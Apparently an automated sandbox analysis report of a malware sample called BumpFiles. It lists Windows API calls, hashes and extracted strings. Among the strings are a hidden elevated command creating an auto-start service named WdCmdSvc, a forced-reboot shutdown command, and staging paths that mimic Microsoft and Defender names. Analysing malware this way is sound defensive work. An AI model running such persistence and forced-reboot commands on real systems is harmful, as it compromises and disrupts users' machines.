                                                                    • Opcode Fuzzy Hash: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
                                                                    • Instruction Fuzzy Hash: 39D0A979920E0281DB304720EE8133E30A2E3D2344FE08077C102A9EDAD53C8CC86509
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Iconic
                                                                    • String ID:
                                                                    • API String ID: 110040809-0
                                                                    • Opcode ID: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
                                                                    • Instruction ID: 18fab1817f0ac2ddc0a628744168dd28ff6dc8f748c4f05e99ad38f9ca4f3eba
                                                                    • Opcode Fuzzy Hash: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
                                                                    • Instruction Fuzzy Hash: A7C01270910E409BCB20E734D494AC03B567790312FD06A90E00286055D775A8C44710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 0042547C: DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                      • Part of subcall function 0042547C: GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                      • Part of subcall function 0042547C: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                      • Part of subcall function 0042547C: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                      • Part of subcall function 0042D8FC: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,006398D3,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 0042D925
                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00639902
                                                                    • Sleep.KERNEL32(0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C,00000000,00633AEE), ref: 00639909
                                                                      • Part of subcall function 00633BD8: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                      • Part of subcall function 0063586C: Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                      • Part of subcall function 0063586C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                      • Part of subcall function 0063586C: Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    • Sleep.KERNEL32(0000012C,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C), ref: 00639956
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Sleep$File$AttributesDeleteDirectoryEnvironmentErrorExecExecuteLastMoveRemoveShellVariable
                                                                    • String ID: .exe$Fairfield Burn$MpCmdRun$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$hWe$web1$web2$web3$:c
                                                                    • API String ID: 482055496-2407289723
                                                                    • Opcode ID: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
                                                                    • Instruction ID: 6a08d19c26d714fab50d671978c63310f8441c2b808e462788730ff630382bdb
                                                                    • Opcode Fuzzy Hash: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
                                                                    • Instruction Fuzzy Hash: A2511034A002089FCB04EB95D89299EB7B6FF49304F50457AF501BB3A1CA78AD11CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408739
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040873F
                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408752
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 0040875B
                                                                    • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,004087D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408786
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 1184211438-79381301
                                                                    • Opcode ID: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
                                                                    • Instruction ID: 94ed4e08121dfc731aadc6161b9dc92060a75603e21bf53f2b7b765583e3cb19
                                                                    • Opcode Fuzzy Hash: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
                                                                    • Instruction Fuzzy Hash: 58116075D00208AEDB10EBA6CE45B6EB7F4EB44304F6084BFE944B76C1DB7C9A408E59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0043598D
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004359A9
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 004359E2
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00435A5F
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00435A78
                                                                    • VariantCopy.OLEAUT32(?), ref: 00435AAD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-3916222277
                                                                    • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                    • Instruction ID: 57dc533516daf27d20718af8ae304f80e1a5e57ae138a1668c92b3d964784860
                                                                    • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                    • Instruction Fuzzy Hash: 5751EDB59006299BCB26EB59C881BD9B3FCAF4C314F0051DAF508E7211D6389F858F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000$`Xd
                                                                    • API String ID: 3320372497-4153497386
                                                                    • Opcode ID: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
                                                                    • Instruction ID: c079a58617cb9f0810b361c2046c62cec813f90908bc8480150aa18e021c2eb6
                                                                    • Opcode Fuzzy Hash: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
                                                                    • Instruction Fuzzy Hash: C6F0C2A478038078EB20BB608C07F1B36299B42B15F50613FB124B90C2C6BC48888AAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
                                                                    • Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
                                                                    • Opcode Fuzzy Hash: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
                                                                    • Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCapture.USER32 ref: 005EDC66
                                                                    • IsWindowUnicode.USER32(00000000), ref: 005EDCA9
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDCC4
                                                                    • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 005EDCE3
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005EDCF2
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005EDD03
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDD23
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                    • String ID:
                                                                    • API String ID: 1994056952-0
                                                                    • Opcode ID: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
                                                                    • Instruction ID: be34951a36e43789f3af398a6a51a07d0984e7834307d8855864e108d5b23d24
                                                                    • Opcode Fuzzy Hash: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
                                                                    • Instruction Fuzzy Hash: 64219C75204649AF9624FA5ACE80FAB77ECAF94350B245429B99EC7242DA54FC40C734
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
                                                                    • Instruction ID: effb08d611f5e391307ffa91fb3e4cdf484130bf0c3f56b27be3f07da332bfd1
                                                                    • Opcode Fuzzy Hash: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
                                                                    • Instruction Fuzzy Hash: 25C133B2710A014BE714AA7D9C8476FB286DBC5325F18823FE215EB3D6DA7CCC558B48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00408E38: GetCurrentThreadId.KERNEL32 ref: 00408E3B
                                                                    • GetTickCount.KERNEL32 ref: 004089E3
                                                                    • GetTickCount.KERNEL32 ref: 004089FB
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408A2A
                                                                    • GetTickCount.KERNEL32 ref: 00408A55
                                                                    • GetTickCount.KERNEL32 ref: 00408A8C
                                                                    • GetTickCount.KERNEL32 ref: 00408AB6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408B26
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
                                                                    • Instruction ID: 04830d6e1a5b1c73318a558b7da50ef5df90f6e1ef99aac74cb934d5c1ef7327
                                                                    • Opcode Fuzzy Hash: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
                                                                    • Instruction Fuzzy Hash: 4C4183706083419ED721AE7CCA8431BBAD1AF90354F14897FE4D8977C1EF7898818B5B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(D*L,00000004,004C0A6C,00000000,004C2852,?,?,004C0A6C,00000001), ref: 004C27F4
                                                                    • GetCurrentThread.KERNEL32 ref: 004C282C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004C2834
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CurrentThread$ErrorLast
                                                                    • String ID: D*L$XhI$j$L
                                                                    • API String ID: 4172138867-1428119162
                                                                    • Opcode ID: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
                                                                    • Instruction ID: f9aeef6c056601da72b3f208aefed89395b05af5cb72de4651f15a5c40964890
                                                                    • Opcode Fuzzy Hash: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
                                                                    • Instruction Fuzzy Hash: 652144749042516ED301EB718981BAABBE4AF49304F40863FE41497781DBB89804C3A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
                                                                    • API String ID: 587946157-4108604376
                                                                    • Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
                                                                    • Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F71
                                                                    • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000), ref: 00424F7C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424FC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                    • String ID:
                                                                    • API String ID: 2927643983-0
                                                                    • Opcode ID: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
                                                                    • Instruction ID: 5c947acfd31bbea33cc86f869339239041117c0650a59772c713c8785221c661
                                                                    • Opcode Fuzzy Hash: 9c55607800b51c44da858b4bdd51aa229d8c941a647f02f8aa322b4bb075b0fc
                                                                    • Instruction Fuzzy Hash: 3F11B97274A2752AF53020697E85F7B1104CBC2768FBB0527F955E67D1D0DC4981906E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00406252
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00406258
                                                                    • GetStdHandle.KERNEL32(000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406277
                                                                    • WriteFile.KERNEL32(00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040627D
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406294
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004053A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 0040629A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 3320372497-0
                                                                    • Opcode ID: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
                                                                    • Instruction ID: 94914c835da9b27d9f252367b9cb564e513d0c16cad5d0b6ae95a77a31fa9b96
                                                                    • Opcode Fuzzy Hash: 8bd0206ba00fc98801813f9ff768997c86d6ad64ba80ef5c009afb1a176602dc
                                                                    • Instruction Fuzzy Hash: 9C0162A12057103DE610B3BA9D86F5B269CCF06728F10467E7114F61D2C57C48148FBA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A1F
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A63
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
                                                                    • Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                    • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                    • Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Sleep$Exec
                                                                    • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
                                                                    • API String ID: 1325486322-1912651170
                                                                    • Opcode ID: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
                                                                    • Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
                                                                    • Opcode Fuzzy Hash: 56e5e6c6a31689e77f25ce9c9ed528b2f48389242c686b60612e1fb36309e717
                                                                    • Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumWindows.USER32(005EC9E8,00000000), ref: 005ECB32
                                                                    • ShowWindow.USER32(?,00000000,005EC9E8,00000000), ref: 005ECB74
                                                                    • ShowOwnedPopups.USER32(00000000,?), ref: 005ECBA3
                                                                    • ShowWindow.USER32(?,00000005), ref: 005ECC18
                                                                    • ShowOwnedPopups.USER32(00000000,?), ref: 005ECC47
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                    • String ID:
                                                                    • API String ID: 315437064-0
                                                                    • Opcode ID: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
                                                                    • Instruction ID: 520c65952f6602bae8faae5d5e0a6eb63dfcaab99f1881edca88c48e5b972915
                                                                    • Opcode Fuzzy Hash: d2616e15c94fc5aa378183f27dbc58f7b45443a5dd5726ba4afef7d475984bd8
                                                                    • Instruction Fuzzy Hash: D5418431604B818FD724DB3AC489BAA7BE6FB84714F550969E4ADC72E1C734EC82DB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C1113A
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00C11149
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C11152
                                                                    • GetTickCount.KERNEL32 ref: 00C1115B
                                                                    • QueryPerformanceCounter.KERNEL32(00000000), ref: 00C11170
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000004.00000002.3857284985.0000000000C10000.00000002.00000001.01000000.00000008.sdmp
                                                                    • Associated: 00000004.00000002.3857351553.0000000000C13000.00000002.00000001.01000000.00000008.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_c10000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 1978eb5d524df979f0649b318542c6ffedecbfdd20f5e9a4de92fd34d0bdfabf
                                                                    • Instruction ID: 71d54a1eb8ecaa77f43db4c348208384b0789f2eeb0347464b633535fc236b3e
                                                                    • Opcode Fuzzy Hash: 1978eb5d524df979f0649b318542c6ffedecbfdd20f5e9a4de92fd34d0bdfabf
                                                                    • Instruction Fuzzy Hash: 2711B375D10208EBDB10DBA4DA487DEBBF8FB0E355F518895D511E7110D634DB10DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    • Opcode ID: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
                                                                    • Instruction ID: ced7317d0bb7603919c6f65922b20b3b5ec63e78df0876d40d037117c1771166
                                                                    • Opcode Fuzzy Hash: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
                                                                    • Instruction Fuzzy Hash: 44F08261301B2019A91035BE28C1BBF51488DC276FB94073BF944D2292D92D4C86419E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005EBBFA
                                                                    • SetEvent.KERNEL32(00000000), ref: 005EBC26
                                                                    • GetCurrentThreadId.KERNEL32 ref: 005EBC2B
                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 005EBC54
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005EBC61
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                    • String ID:
                                                                    • API String ID: 2132507429-0
                                                                    • Opcode ID: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
                                                                    • Instruction ID: 3a001b7b59bab94448f4574198c486d7b1ad41d0dfc1326082cf4b057d3abe7e
                                                                    • Opcode Fuzzy Hash: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
                                                                    • Instruction Fuzzy Hash: 5D012BB0108B02DFE728EB66CC49B5A3BE5BF80316F508519B0A5CB1E0DB349880C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409AFA
                                                                    • FreeLibrary.KERNEL32(?,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409B98
                                                                    • ExitProcess.KERNEL32(00000000,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409BD1
                                                                      • Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
                                                                      • Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
                                                                      • Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
                                                                      • Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
